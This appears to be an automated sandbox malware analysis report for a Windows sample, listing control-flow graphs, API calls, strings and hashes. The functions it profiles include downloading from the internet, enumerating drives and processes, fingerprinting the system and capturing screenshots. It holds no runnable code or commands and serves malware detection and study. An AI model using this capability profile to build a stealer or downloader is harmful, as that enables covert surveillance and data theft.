                          control_flow_graph 983 7ff6f6081300-7ff6f6081364 call 7ff6f6084890 InternetOpenW 986 7ff6f6081366-7ff6f608136b 983->986 987 7ff6f60813a0-7ff6f60813a2 983->987 989 7ff6f608136d 986->989 990 7ff6f6081370-7ff6f6081395 InternetOpenUrlW 986->990 988 7ff6f6081667-7ff6f6081691 call 7ff6f60838f0 987->988 989->990 991 7ff6f60813a7-7ff6f60813c2 call 7ff6f60846e4 990->991 992 7ff6f6081397-7ff6f608139a InternetCloseHandle 990->992 997 7ff6f60813c4-7ff6f60813ce 991->997 998 7ff6f60813d0-7ff6f60813d4 991->998 992->987 999 7ff6f60813d7-7ff6f60813e7 997->999 998->999 1000 7ff6f60813fd-7ff6f6081419 999->1000 1001 7ff6f60813e9-7ff6f60813f8 999->1001 1003 7ff6f6081692-7ff6f6081697 call 7ff6f60811b0 1000->1003 1004 7ff6f608141f-7ff6f6081427 1000->1004 1002 7ff6f6081504-7ff6f608154e call 7ff6f6082cf0 1001->1002 1017 7ff6f6081585-7ff6f60815b4 call 7ff6f6085198 1002->1017 1018 7ff6f6081550-7ff6f6081562 1002->1018 1014 7ff6f6081698-7ff6f608169f call 7ff6f6081110 1003->1014 1007 7ff6f608142d-7ff6f6081437 1004->1007 1008 7ff6f60814c6 1004->1008 1011 7ff6f6081439-7ff6f6081446 1007->1011 1012 7ff6f6081472-7ff6f6081485 1007->1012 1013 7ff6f60814cb-7ff6f60814e1 1008->1013 1019 7ff6f608144a-7ff6f6081458 call 7ff6f6083910 1011->1019 1015 7ff6f6081487-7ff6f6081494 1012->1015 1016 7ff6f6081496-7ff6f608149d 1012->1016 1020 7ff6f60814f6-7ff6f60814ff 1013->1020 1021 7ff6f60814e3-7ff6f60814f4 1013->1021 1015->1013 1023 7ff6f60814b5-7ff6f60814c4 call 7ff6f6083910 1016->1023 1024 7ff6f608149f-7ff6f60814a6 1016->1024 1040 7ff6f60815cc-7ff6f60815e2 InternetReadFile 1017->1040 1041 7ff6f60815b6-7ff6f60815c7 InternetCloseHandle * 2 1017->1041 1025 7ff6f6081564-7ff6f6081577 1018->1025 1026 7ff6f6081580 call 7ff6f608394c 1018->1026 1036 7ff6f608145a-7ff6f6081470 1019->1036 1037 7ff6f60814ae-7ff6f60814b4 call 7ff6f6085368 1019->1037 1020->1002 1021->1020 1021->1021 1023->1013 1024->1014 1031 7ff6f60814ac 1024->1031 1025->1026 1032 7ff6f6081579-7ff6f608157f call 7ff6f6085368 1025->1032 
1026->1017 1031->1019 1032->1026 1036->1013 1037->1023 1042 7ff6f6081618-7ff6f608161d call 7ff6f6082c30 1040->1042 1043 7ff6f60815e4-7ff6f60815e9 1040->1043 1046 7ff6f608165a-7ff6f6081664 call 7ff6f60816a0 1041->1046 1052 7ff6f6081622-7ff6f6081625 1042->1052 1043->1042 1047 7ff6f60815eb-7ff6f6081616 call 7ff6f6085168 InternetReadFile 1043->1047 1046->988 1047->1042 1047->1043 1055 7ff6f6081627-7ff6f6081640 call 7ff6f6085200 1052->1055 1056 7ff6f6081646-7ff6f6081658 InternetCloseHandle * 2 1052->1056 1055->1056 1056->1046
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Internet$CloseHandle$FileOpenRead$Concurrency::cancel_current_task
                          • String ID: WinINetDownloader
                          • API String ID: 767669915-3650426168
                          • Opcode ID: a8d219060c47295b2708c97b2f62da7ac2fca95a3641a265d16f4eb374730639
                          • Instruction ID: 2976dc32ada8f2da7c5b69d6dd56410cfd99f40c64c970b286ca83b0e808c37a
                          • Opcode Fuzzy Hash: a8d219060c47295b2708c97b2f62da7ac2fca95a3641a265d16f4eb374730639
                          • Instruction Fuzzy Hash: 84A1A232A1DB8286EB50CB35E54027963A8FF85B94F644531EAAD83BE4FE7ED445C700

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountLookup
                          • String ID: NONE_MAPPED$Network
                          • API String ID: 1972796461-3150097737
                          • Opcode ID: e393c4395483ecdbf19e55be59f9c2ef9305885c7219f6ab52e586474c7cd7fe
                          • Instruction ID: 5881c90d5630bb7872d83a4f4832f8d016f0752e2986c6ac81128469fae75e55
                          • Opcode Fuzzy Hash: e393c4395483ecdbf19e55be59f9c2ef9305885c7219f6ab52e586474c7cd7fe
                          • Instruction Fuzzy Hash: AE417231244AC286FA149B11F884BEA73B3F795B85F44453ADA89477A5EF39DE0BC700

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValue_vswprintf_s_l
                          • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                          • API String ID: 1477497710-3190923360
                          • Opcode ID: 4262950ad49c61d605c756f4cea3116342fb25d2c80c30ab984ddaf2da6b532a
                          • Instruction ID: 9e55308c119035b435057651a381e4d792f1f1431f957dbcbaff313671d04324
                          • Opcode Fuzzy Hash: 4262950ad49c61d605c756f4cea3116342fb25d2c80c30ab984ddaf2da6b532a
                          • Instruction Fuzzy Hash: D8319072255BC682FA60DB11F580BD97373F785B94F405229EE8A07B99DF38CA46CB00

                          Control-flow Graph

                          control_flow_graph 1110 1cfb96098c0-1cfb96098e6 1111 1cfb96098ef-1cfb9609924 GetLogicalDriveStringsW 1110->1111 1112 1cfb96098e8-1cfb96098ea 1110->1112 1114 1cfb960992a-1cfb9609938 1111->1114 1115 1cfb96099dd-1cfb96099e3 lstrcpyW 1111->1115 1113 1cfb9609a0b-1cfb9609a25 call 1cfb96118a0 1112->1113 1114->1115 1117 1cfb960993e 1114->1117 1118 1cfb96099e9 1115->1118 1120 1cfb9609946-1cfb9609963 lstrcmpiW 1117->1120 1121 1cfb96099eb-1cfb9609a03 1118->1121 1122 1cfb9609965-1cfb9609977 lstrcmpiW 1120->1122 1123 1cfb96099cc-1cfb96099d7 1120->1123 1121->1113 1122->1123 1124 1cfb9609979-1cfb96099a8 QueryDosDeviceW 1122->1124 1123->1115 1123->1120 1124->1118 1125 1cfb96099aa-1cfb96099ca lstrlenW call 1cfb96127c0 1124->1125 1125->1123 1128 1cfb9609a26-1cfb9609a46 lstrcpyW lstrcatW 1125->1128 1128->1121
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStringslstrcatlstrlen
                          • String ID: A:\$B:\
                          • API String ID: 1889997506-1009255891
                          • Opcode ID: cc35f10c472c84fe476aa86446e84a2d1080405b0ff074f1aa1dec8f82191c6d
                          • Instruction ID: 982c70a56d374525f28710f3400dcd23d134bb49aca65c2ec803468ef3b6c57b
                          • Opcode Fuzzy Hash: cc35f10c472c84fe476aa86446e84a2d1080405b0ff074f1aa1dec8f82191c6d
                          • Instruction Fuzzy Hash: 6C414375244AC285FA709B11E880BDE7373F798B85F44502ADA8947799EF7CCA46CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: SectionVirtual$ProtectView$AllocCreateUnmap
                          • String ID: @
                          • API String ID: 1653215272-2766056989
                          • Opcode ID: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
                          • Instruction ID: b58f64b13160cddbb21019682a8a77bd2f0eaff82a1fedc1a55df7850ab99d4b
                          • Opcode Fuzzy Hash: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
                          • Instruction Fuzzy Hash: 5B729B31658B588BEB69DF28C885BE973E6FF98310F28452DD88BC7151DB34EA438741
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Value$AllocCreateDeleteOpenSleepVirtual
                          • String ID: .$l$n
                          • API String ID: 2516758476-2376909228
                          • Opcode ID: 6efd494f1771a83e1622dba27cf1971ef9d7551aafc06c164830ee9e4ee08136
                          • Instruction ID: 72a02351d6f406a5868d53ded8a201c15091f15d206d0dbe581551cf4434322b
                          • Opcode Fuzzy Hash: 6efd494f1771a83e1622dba27cf1971ef9d7551aafc06c164830ee9e4ee08136
                          • Instruction Fuzzy Hash: 08B17F30618A888FFB64EF68D844BDA73E6FF99305F14412DA44BC7191DB78DA45CB42
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: connectgethostbynamesocket
                          • String ID: 0u
                          • API String ID: 1495599467-3203441087
                          • Opcode ID: 84b7b3bca6920cc8a9683eb24846bb0459563868bb5748dfd0158d2d2b471ceb
                          • Instruction ID: 45de217ebbf946f91e9b6654eb6b6cfd13ceb3ecd57e9578f84c1ab21f69001c
                          • Opcode Fuzzy Hash: 84b7b3bca6920cc8a9683eb24846bb0459563868bb5748dfd0158d2d2b471ceb
                          • Instruction Fuzzy Hash: 14917F7061CB488FE758DF28D4457AAB7E5FB98304F10492EE58BC3290DB74E906CB86
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DiskDriveFreeGlobalMemorySpaceStatusType
                          • String ID: %sFree%d Gb $:$@$HDD:%d
                          • API String ID: 3475944273-3501811827
                          • Opcode ID: c6b34b87c4707ce2202623c9a1da05e2d2efcd629a34194bb4d2bfd65ede8d83
                          • Instruction ID: 18d4c71dea7563c5185f50c6c05301dc768b8feb2283ec8ef6d5e54badd1a88d
                          • Opcode Fuzzy Hash: c6b34b87c4707ce2202623c9a1da05e2d2efcd629a34194bb4d2bfd65ede8d83
                          • Instruction Fuzzy Hash: 4E315C36208BC586E760DB15F840B8BB3B6F389784F90112AEACD43B29DF38C556CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFreeInitializeInstanceStringUninitialize
                          • String ID: FriendlyName$Network
                          • API String ID: 841178590-1437807293
                          • Opcode ID: 2c5c4b6b2c41542d4b871e72c06e1fdebbf868c540bd732ef293f0ccc01ef82e
                          • Instruction ID: 8c1c9b2d9cbb3214796f4729c2db7b76e2837bb145fb88539e8ba543d14d0627
                          • Opcode Fuzzy Hash: 2c5c4b6b2c41542d4b871e72c06e1fdebbf868c540bd732ef293f0ccc01ef82e
                          • Instruction Fuzzy Hash: FB31FF76244A8682EB50DF35E480BDA77B2F7D4F98F554026DA4E83724DF38C98ACB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoSystem$AddressHandleModuleNativeProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 3433367815-192647395
                          • Opcode ID: 812c2325d0cc55593327c1f2f69d89585b164903738284ab9866f3d98fbcdec6
                          • Instruction ID: cbf47c96437ae1836900d7f85125bc04f49b7670c69516fa622c31248db68af1
                          • Opcode Fuzzy Hash: 812c2325d0cc55593327c1f2f69d89585b164903738284ab9866f3d98fbcdec6
                          • Instruction Fuzzy Hash: 9501E835655BC686EAA0AB14E89079A72B7F388740F94052AD68E42B94EF2DCB568700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$recvselect
                          • String ID:
                          • API String ID: 4102763267-0
                          • Opcode ID: 4fd4400789ad907de071142e916aeea2107531b851bf8881d6973165b3bc5834
                          • Instruction ID: 95443252d1c682d8b4781007347c57b33325662fb46a182080bbdfba1012b7e5
                          • Opcode Fuzzy Hash: 4fd4400789ad907de071142e916aeea2107531b851bf8881d6973165b3bc5834
                          • Instruction Fuzzy Hash: C131E171244AD282FB709B25E484FDA73B3F784B89F00413ADB4947BC9EB38C9068709
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 1789362936-0
                          • Opcode ID: 1d1c4d45bde62b7eb6451df214e2b8338f83561ada536a8c26e1dbaab7acb04f
                          • Instruction ID: b4433ea2e125984ab68041f57eb7227444e2ee7afa1817518eb8c1d79b521612
                          • Opcode Fuzzy Hash: 1d1c4d45bde62b7eb6451df214e2b8338f83561ada536a8c26e1dbaab7acb04f
                          • Instruction Fuzzy Hash: 0E2187312446C286FB649B25E8947AA77B3F7D8B94F448239D999467A4EF3CCA06C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFactory
                          • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                          • API String ID: 1145517477-257307503
                          • Opcode ID: 0841caf3cacf5e98688c35e219301d40f8b2c0522cc3051f10e647fb0cbd250b
                          • Instruction ID: ab3086f3a637af00137ee86e58a6954c6ad6a4e39bfa8950ccaae4d099fcb743
                          • Opcode Fuzzy Hash: 0841caf3cacf5e98688c35e219301d40f8b2c0522cc3051f10e647fb0cbd250b
                          • Instruction Fuzzy Hash: 26E19C32750A8586FA10CB65D9847EE6373F784BE4F544629DE6E17BE8CB39CA46C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$CreateInformationVersion
                          • String ID:
                          • API String ID: 3563531100-0
                          • Opcode ID: baa38fae55a4b4714cb9625f470aef3d5fa3ce788670dbd23bb72a12501c91c4
                          • Instruction ID: d3dd90bff7e2c6e10aedfe7ac5e24fde613155f0b61c75aa459c44fa7ffd4f75
                          • Opcode Fuzzy Hash: baa38fae55a4b4714cb9625f470aef3d5fa3ce788670dbd23bb72a12501c91c4
                          • Instruction Fuzzy Hash: 7FE06D346516D382FB846B14E805FD522B3B7A8704F80543DD94A03784DF3CCA8B8704
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                          • Instruction ID: 4bf00c6bef2d7449964654eb3a06488454d9eadb585b1ae0cb398f2a7a3a40d9
                          • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                          • Instruction Fuzzy Hash: 2AC163306549554BFB99DB28C8D5BEAB3E6FF98300F2C413DD45AC31A6DB20EE538681

                          Control-flow Graph

                          control_flow_graph 242 1cfb960e1c0-1cfb960e24a GlobalAlloc GlobalLock call 1cfb96118d0 GlobalUnlock CreateStreamOnHGlobal 245 1cfb960e250-1cfb960e2b0 call 1cfb9626448 call 1cfb9626458 call 1cfb960b6d0 242->245 246 1cfb960e4d3-1cfb960e4dc GlobalFree 242->246 256 1cfb960e2b6-1cfb960e2e3 GdipCreateBitmapFromStream 245->256 257 1cfb960e43b-1cfb960e458 245->257 247 1cfb960e4df-1cfb960e505 call 1cfb96118a0 246->247 258 1cfb960e2f0-1cfb960e30b call 1cfb960b990 GdipDisposeImage 256->258 259 1cfb960e2e5-1cfb960e2eb GdipDisposeImage 256->259 262 1cfb960e45a-1cfb960e478 DeleteObject 257->262 263 1cfb960e47e-1cfb960e491 call 1cfb9626448 257->263 258->257 266 1cfb960e311-1cfb960e32a CreateStreamOnHGlobal 258->266 259->257 262->263 269 1cfb960e493-1cfb960e4aa call 1cfb9626448 263->269 270 1cfb960e4c6-1cfb960e4cd call 1cfb9626458 263->270 266->257 268 1cfb960e330-1cfb960e339 call 1cfb960bdb0 266->268 273 1cfb960e33e-1cfb960e364 GetHGlobalFromStream GlobalLock 268->273 278 1cfb960e4b2-1cfb960e4c0 call 1cfb9626458 269->278 279 1cfb960e4ac call 1cfb9626758 269->279 270->246 276 1cfb960e366-1cfb960e385 GlobalFree call 1cfb960b790 273->276 277 1cfb960e38a-1cfb960e3e0 GlobalSize call 1cfb9611878 call 1cfb96118d0 call 1cfb960f480 call 1cfb960ad90 273->277 276->247 293 1cfb960e3e2-1cfb960e3e6 call 1cfb9611880 277->293 294 1cfb960e3eb-1cfb960e3ee 277->294 278->270 279->278 293->294 296 1cfb960e3f0-1cfb960e3f3 call 1cfb9611880 294->296 297 1cfb960e3f8-1cfb960e3ff 294->297 296->297 299 1cfb960e401-1cfb960e41f DeleteObject 297->299 300 1cfb960e425-1cfb960e435 GlobalUnlock 297->300 299->300 300->257
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$DisposeFreeFromImageLock$AllocBitmapDeleteGdiplusObjectShutdownUnlock
                          • String ID:
                          • API String ID: 562715702-0
                          • Opcode ID: 42898a941c2d68d10d428d3b7f6529fd9f89c56f0b88e70156fc75360aed880c
                          • Instruction ID: c191574f7f4df3e5ed64f1a145a7c9ac1646844faa77a0f515952d49cbafea8d
                          • Opcode Fuzzy Hash: 42898a941c2d68d10d428d3b7f6529fd9f89c56f0b88e70156fc75360aed880c
                          • Instruction Fuzzy Hash: 51A14C32744B8286FB14EF65E894BDD33B7F754B98F00452ACD5A57AA4DF38CA1A8340

                          Control-flow Graph

                          control_flow_graph 567 1cfb960bdb0-1cfb960bde0 call 1cfb960b6d0 570 1cfb960bec0 567->570 571 1cfb960bde6-1cfb960bdf6 GdipGetImageEncodersSize 567->571 572 1cfb960bec5-1cfb960bee0 call 1cfb96118a0 570->572 571->570 573 1cfb960bdfc-1cfb960be07 571->573 575 1cfb960be43-1cfb960be50 573->575 576 1cfb960be09-1cfb960be12 call 1cfb960b240 573->576 577 1cfb960be56-1cfb960be62 call 1cfb9611e40 575->577 578 1cfb960c097-1cfb960c0a1 call 1cfb9601220 575->578 586 1cfb960be40 576->586 587 1cfb960be14-1cfb960be1e 576->587 588 1cfb960be64-1cfb960be66 577->588 589 1cfb960be68-1cfb960be72 577->589 586->575 590 1cfb960be20 587->590 591 1cfb960be2a-1cfb960be3e call 1cfb961dd80 587->591 592 1cfb960be75-1cfb960be78 588->592 589->592 590->591 591->592 594 1cfb960be97-1cfb960bea7 GdipGetImageEncoders 592->594 595 1cfb960be7a-1cfb960be7d 592->595 599 1cfb960bee1-1cfb960bef1 594->599 600 1cfb960bea9-1cfb960beac 594->600 597 1cfb960be7f 595->597 598 1cfb960be90-1cfb960be95 595->598 604 1cfb960be80-1cfb960be8e call 1cfb9611e00 597->604 598->572 602 1cfb960bef3 599->602 603 1cfb960bf3a 599->603 600->570 601 1cfb960beae 600->601 605 1cfb960beb0-1cfb960bebe call 1cfb9611e00 601->605 607 1cfb960bf00-1cfb960bf17 602->607 606 1cfb960bf41-1cfb960bf54 603->606 604->598 605->570 610 1cfb960bf73-1cfb960bf75 606->610 611 1cfb960bf56-1cfb960bf61 606->611 612 1cfb960bf19-1cfb960bf24 607->612 613 1cfb960bf2a-1cfb960bf2c 607->613 617 1cfb960bf78-1cfb960bf7a 610->617 611->610 616 1cfb960bf63-1cfb960bf65 611->616 612->613 618 1cfb960bf26-1cfb960bf28 612->618 619 1cfb960bf2f-1cfb960bf31 613->619 616->617 620 1cfb960bf9a-1cfb960bfa8 617->620 621 1cfb960bf7c-1cfb960bf7f 617->621 618->619 622 1cfb960bf33-1cfb960bf38 619->622 623 1cfb960bf67-1cfb960bf71 619->623 625 1cfb960c01a-1cfb960c047 GdipCreateBitmapFromHBITMAP GdipSaveImageToStream 620->625 626 1cfb960bfaa-1cfb960bff4 GdipCreateBitmapFromScan0 GdipSaveImageToStream 620->626 621->570 624 1cfb960bf85-1cfb960bf93 call 1cfb9611e00 
621->624 622->603 622->607 623->606 638 1cfb960bf95 624->638 627 1cfb960c075-1cfb960c07e GdipDisposeImage 625->627 628 1cfb960c049-1cfb960c052 GdipDisposeImage 625->628 626->627 630 1cfb960bff6-1cfb960bfff GdipDisposeImage 626->630 633 1cfb960c090-1cfb960c092 627->633 634 1cfb960c080-1cfb960c08e call 1cfb9611e00 627->634 628->570 631 1cfb960c058 628->631 630->570 635 1cfb960c005-1cfb960c013 call 1cfb9611e00 630->635 637 1cfb960c060-1cfb960c06e call 1cfb9611e00 631->637 633->572 634->633 643 1cfb960c015 635->643 645 1cfb960c070 637->645 638->570 643->570 645->570
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Gdip$Image$free$Dispose$BitmapCreateEncodersFromSaveStream$Scan0Sizemalloc
                          • String ID: &
                          • API String ID: 1890951399-3042966939
                          • Opcode ID: 55c4d5524a8ad467499d60b3f08160cb74a9a45ad6dfb88b86dca0659664e4bc
                          • Instruction ID: 238e741e00d3f4d4a58ebfea4c4d374e15d826694ef2405aaa73ea17790f5b76
                          • Opcode Fuzzy Hash: 55c4d5524a8ad467499d60b3f08160cb74a9a45ad6dfb88b86dca0659664e4bc
                          • Instruction Fuzzy Hash: 45915C323806C285FE549F31D490BE927B3EB54BD8F89863ADA19476D5EF28CE468340

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion
                          • String ID: -N/$NO/$None/%s
                          • API String ID: 4155081256-3095023699
                          • Opcode ID: 937225b56d9130d735a7e5b2e703808313462ec383e8fec49d005699c9261ae8
                          • Instruction ID: 647aa311997f77c0105e2281a3747b3cc56d9bdec9ac6d2c3897c04c58fd5c7c
                          • Opcode Fuzzy Hash: 937225b56d9130d735a7e5b2e703808313462ec383e8fec49d005699c9261ae8
                          • Instruction Fuzzy Hash: 59515B31254AC386FB60EB11E8D4BD973B3F795B84F44503ADA4A02699DF39CE46C700

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
